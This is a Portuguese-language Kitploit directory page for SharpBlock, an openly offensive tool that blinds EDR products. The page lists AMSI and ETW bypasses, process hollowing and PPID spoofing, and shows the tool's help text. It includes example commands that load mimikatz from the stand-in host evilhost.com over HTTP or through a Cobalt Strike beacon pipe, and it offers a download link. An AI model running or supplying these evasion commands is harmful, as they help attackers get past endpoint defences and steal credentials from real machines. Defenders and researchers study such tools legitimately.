Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpBlock — Um método de contornar as DLLs de projeção ativa do EDR ao impedir a execução do ponto de entrada. | Kitploit
Ferramentas/GitHubGitHub/ccob/sharpblock
Red Teaming
GitHubccob/sharpblock

SharpBlock

Um método de contornar as DLLs de projeção ativa do EDR ao impedir a execução do ponto de entrada.

Ver Repositório
1.2k165há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpBlock

Um método de contornar as DLLs de projeção ativa do EDR impedindo a execução do ponto de entrada.

Funcionalidades

  • Bloqueia a execução do ponto de entrada da DLL do EDR, impedindo que os hooks do EDR sejam inseridos.
  • Bypass de AMSI sem patch, indetectável por scanners que procuram por correções de código na Amsi.dll em tempo de execução.
  • Processo hospedeiro que é substituído por um PE de implante que pode ser carregado a partir do disco, HTTP ou pipe nomeado (Cobalt Strike)
  • O processo implantado fica oculto para ajudar a evadir scanners que procuram por processos ocos.
  • Os argumentos da linha de comando são falsificados e implantados após a criação do processo usando um método furtivo de detecção do EDR.
  • Bypass de ETW sem patch.
  • Bloqueia a invocação de NtProtectVirtualMemory quando o chamador está dentro do intervalo do espaço de endereço de uma DLL bloqueada.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Exemplos

Iniciar o mimikatz via HTTP usando o notepad como processo hospedeiro, bloqueando a DLL do SylantStrike

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Iniciar o mimikatz usando o Cobalt Strike beacon via pipe nomeado usando o notepad como processo hospedeiro, bloqueando a DLL do SylantStrike

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Nota: para o comando upload_file do beacon, carregue o upload.cna no Gerenciador de Scripts do Cobalt Strike

Postagens no Blog que Acompanham:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
Baixar ferramenta